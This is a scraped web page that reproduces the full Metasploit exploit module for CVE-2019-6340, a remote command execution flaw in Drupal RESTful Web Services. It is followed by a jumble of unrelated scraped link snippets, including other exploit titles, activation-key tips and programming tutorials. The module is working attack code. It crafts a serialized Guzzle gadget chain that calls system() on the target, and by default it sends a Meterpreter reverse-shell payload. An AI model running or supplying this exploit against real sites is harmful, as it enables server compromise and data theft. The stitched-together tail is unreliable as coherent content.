[EXP]Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
## class MetasploitModule < Msf::Exploit::Remote # NOTE: All (four) Web Services modules need to be enabled
Rank = NormalRanking include Msf::Exploit::Remote::HTTP::Drupal def initialize(info = {})
super(update_info(info,
'Name' => 'Drupal RESTful Web Services unserialize() RCE',
'Description' => %q{
This module exploits a PHP unserialize() vulnerability in Drupal RESTful
Web Services by sending a crafted request to the /node REST endpoint. As per SA-CORE-2019-003, the initial remediation was to disable POST,
PATCH, and PUT, but Ambionics discovered that GET was also vulnerable
(albeit cached). Cached nodes can be exploited only once. Drupal updated SA-CORE-2019-003 with PSA-2019-02-22 to notify users of
this alternate vector. Drupal < 8.5.11 and < 8.6.10 are vulnerable.
},
'Author' => [
'Jasper Mattsson', # Discovery
'Charles Fol', # PoC
'Rotem Reiss', # Module
'wvu' # Module
],
'References' => [
['CVE', '2019-6340'],
['URL', 'https://www.drupal.org/sa-core-2019-003'],
['URL', 'https://www.drupal.org/psa-2019-02-22'],
['URL', 'https://www.ambionics.io/blog/drupal8-rce'],
['URL', 'https://github.com/ambionics/phpggc'],
['URL', 'https://twitter.com/jcran/status/1099206271901798400']
],
'DisclosureDate' => '2019-02-20',
'License' => MSF_LICENSE,
'Platform' => ['php', 'unix'],
'Arch' => [ARCH_PHP, ARCH_CMD],
'Privileged' => false,
'Targets' => [
['PHP In-Memory',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Type' => :php_memory,
'Payload' => {'BadChars' => "'"},
'DefaultOptions' => {
'PAYLOAD' => 'php/meterpreter/reverse_tcp'
}
],
['Unix In-Memory',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_memory,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/generic',
'CMD' => 'id'
}
]
],
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliablity' => [UNRELIABLE_SESSION], # When using the GET method
'AKA' => ['SA-CORE-2019-003']
}
)) register_options([
OptEnum.new('METHOD', [true, 'HTTP method to use', 'POST',
['GET', 'POST', 'PATCH', 'PUT']]),
OptInt.new('NODE', [false, 'Node ID to target with GET method', 1])
]) register_advanced_options([
OptBool.new('ForceExploit', [false, 'Override check result', false])
])
end def check
checkcode = CheckCode::Unknown version = drupal_version unless version
vprint_error('Could not determine Drupal version')
return checkcode
end if version.to_s !~ /^8\b/
vprint_error("Drupal #{version} is not supported")
return CheckCode::Safe
end vprint_status("Drupal #{version} targeted at #{full_uri}")
checkcode = CheckCode::Detected changelog = drupal_changelog(version) unless changelog
vprint_error('Could not determine Drupal patch level')
return checkcode
end case drupal_patch(changelog, 'SA-CORE-2019-003')
when nil
vprint_warning('CHANGELOG.txt no longer contains patch level')
when true
vprint_warning('Drupal appears patched in CHANGELOG.txt')
checkcode = CheckCode::Safe
when false
vprint_good('Drupal appears unpatched in CHANGELOG.txt')
checkcode = CheckCode::Appears
end # Any further with GET and we risk caching the targeted node
return checkcode if meth == 'GET' # NOTE: Exploiting the vuln will move us from "Safe" to Vulnerable
token = Rex::Text.rand_text_alphanumeric(8..42)
res = execute_command("echo #{token}") return checkcode unless res if res.body.include?(token)
vprint_good('Drupal is vulnerable to code execution')
checkcode = CheckCode::Vulnerable
end checkcode
end def exploit
if [CheckCode::Safe, CheckCode::Unknown].include?(check)
if datastore['ForceExploit']
print_warning('ForceExploit set! Exploiting anyway!')
else
fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
end
end if datastore['PAYLOAD'] == 'cmd/unix/generic'
print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic')
# XXX: Naughty datastore modification
datastore['DUMP_OUTPUT'] = true
end case target['Type']
when :php_memory
# XXX: This will spawn a *very* obvious process
execute_command("php -r '#{payload.encoded}'")
when :unix_memory
execute_command(payload.encoded)
end
end def execute_command(cmd, opts = {})
vprint_status("Executing with system(): #{cmd}") # https://en.wikipedia.org/wiki/Hypertext_Application_Language
hal_json = JSON.pretty_generate(
'link' => [
'value' => 'link',
'options' => phpggc_payload(cmd)
],
'_links' => {
'type' => {
'href' => vhost_uri
}
}
) print_status("Sending #{meth} to #{node_uri} with link #{vhost_uri}") res = send_request_cgi({
'method' => meth,
'uri' => node_uri,
'ctype' => 'application/hal+json',
'vars_get' => {'_format' => 'hal_json'},
'data' => hal_json
}, 3.5) return unless res case res.code
# 401 isn't actually a failure when using the POST method
when 200, 401
print_line(res.body) if datastore['DUMP_OUTPUT']
if meth == 'GET'
print_warning('If you did not get code execution, try a new node ID')
end
when 404
print_error("#{node_uri} not found")
when 405
print_error("#{meth} method not allowed")
when 422
print_error('VHOST may need to be set')
when 406
print_error('Web Services may not be enabled')
else
print_error("Unexpected reply: #{res.inspect}")
end res
end # phpggc Guzzle/RCE1 system id
def phpggc_payload(cmd)
(
# http://www.phpinternalsbook.com/classes_objects/serialization.html
<<~EOF
O:24:"GuzzleHttp\\Psr7\\FnStream":2:{
s:33:"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods";a:1:{
s:5:"close";a:2:{
i:0;O:23:"GuzzleHttp\\HandlerStack":3:{
s:32:"\u0000GuzzleHttp\\HandlerStack\u0000handler";
s:cmd_len:"cmd";
s:30:"\u0000GuzzleHttp\\HandlerStack\u0000stack";
a:1:{i:0;a:1:{i:0;s:6:"system";}}
s:31:"\u0000GuzzleHttp\\HandlerStack\u0000cached";
b:0;
}
i:1;s:7:"resolve";
}
}
s:9:"_fn_close";a:2:{
i:0;r:4;
i:1;s:7:"resolve";
}
}
EOF
).gsub(/\s+/, '').gsub('cmd_len', cmd.length.to_s).gsub('cmd', cmd)
end def meth
datastore['METHOD'] || 'POST'
end def node
datastore['NODE'] || 1
end def node_uri
if meth == 'GET'
normalize_uri(target_uri.path, '/node', node)
else
normalize_uri(target_uri.path, '/node')
end
end def vhost_uri
full_uri(
normalize_uri(target_uri.path, '/rest/type/shortcut/default'),
vhost_uri: true
)
end end
[EXP]Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)的更多相关文章
- [EXP]Jenkins 2.150.2 - Remote Command Execution (Metasploit)
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...
- [EXP]Apache Spark - Unauthenticated Command Execution (Metasploit)
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...
- WebStorm 11、PhpStorm 10免费激活(不需要注册码)
之前分享的WebStorm9.WebStrom10.PhpStorm9注册码生成网站已经被站长关了,比较遗憾!http://my.oschina.net/ximidao/blog/486353 现在官 ...
- 下面程序的输出结果是____ A:11,10 B:11,11 C:10,10 D:10,11 int x=10; int y=x++; printf("%d,%d",(x++,y),y++);
下面程序的输出结果是____ A:11,10 B:11,11 C:10,10 D:10,11 int x=10; int y=x++; printf("%d,%d",(x++,y) ...
- ssh The authenticity of host '10.11.26.2 (10.11.26.2)' can't be established
The authenticity of host '10.11.26.2 (10.11.26.2)' can't be established. ECDSA key fingerprint is SH ...
- jenkins git can't work ERROR: Timeout after 10 minutes ERROR: Error fetching remote repo 'origin'
Started by user Allen Running as Allen Building remotely on MISTestSrv2 (MIS) in workspace C:\jenkin ...
- 10 Future Web Trends 十大未来互联网趋势
转载自:http://blog.sina.com.cn/s/blog_4be577310100ajpb.html 我们很满意自己进入的当前网络纪元,通常被称为Web 2.0.这个阶段互联网的特征包括搜 ...
- CXF(2.7.10) - RESTful Services, JSON Support
在 CXF(2.7.10) - RESTful Services 介绍了 REST 风格的 WebService 服务,数据传输是基于 XML 格式的.如果要基于 JSON 格式传输数据,仅需要将注解 ...
- [EXP]Microsoft Windows MSHTML Engine - "Edit" Remote Code Execution
# Exploit Title: Microsoft Windows (CVE-2019-0541) MSHTML Engine "Edit" Remote Code Execut ...
随机推荐
- Selenium Webdriver元素定位的八种常用方式(转载)
转载自 https://www.cnblogs.com/qingchunjun/p/4208159.html 在使用selenium webdriver进行元素定位时,通常使用findElement或 ...
- c++ 中的数字和字符串的转换
理由:一直忘记数字型的字符串和数字之间的转换,这次总结一下,以便后面再次用到. 其实 C++ 已经给我们写好了相应的函数,直接拿来用即可 QA1:如何把一个数字转换为一个数字字符串?(这个不是很常用) ...
- 丑数(python)
题目描述 把只包含质因子2.3和5的数称作丑数(Ugly Number).例如6.8都是丑数,但14不是,因为它包含质因子7. 习惯上我们把1当做是第一个丑数.求按从小到大的顺序的第N个丑数. # ...
- 384. Shuffle an Array数组洗牌
[抄题]: Shuffle a set of numbers without duplicates. Example: // Init an array with set 1, 2, and 3. i ...
- [leetcode]13. Roman to Integer罗马数字转整数
Roman numerals are represented by seven different symbols: I, V, X, L, C, D and M. Symbol Value I 1 ...
- Java线程池的构造以及使用
有时候,系统需要处理非常多的执行时间很短的请求,如果每一个请求都开启一个新线程的话,系统就要不断的进行线程的创建和销毁,有时花在创建和销毁线程上的时间会比线程真正执行的时间还长.而且当线程数量太多时, ...
- Retrofit 2.0基于OKHttp更高效更快的网络框架 以及自定义转换器
时间关系,本文就 Retrofit 2.0的简单使用 做讲解 至于原理以后有空再去分析 项目全面.简单.易懂 地址: 关于Retrofit 2.0的简单使用如下: https://gitee.c ...
- iOS 拨打电话三种方式
,这种方法,拨打完电话回不到原来的应用,会停留在通讯录里,而且是直接拨打,不弹出提示 NSMutableString * str=[[NSMutableString alloc] initWithFo ...
- centos 安装解压工作
解压工具: yum install ark 编辑器: yum install gedit
- boost学习 内嵌类型检测 与 any 的代码练习
本文是学习 boost源码的一些练习 参考文章来自 刘未鹏 C++的罗浮宫(http://blog.csdn.net/pongba) 目录 http://blog.csdn.net/pongba/ar ...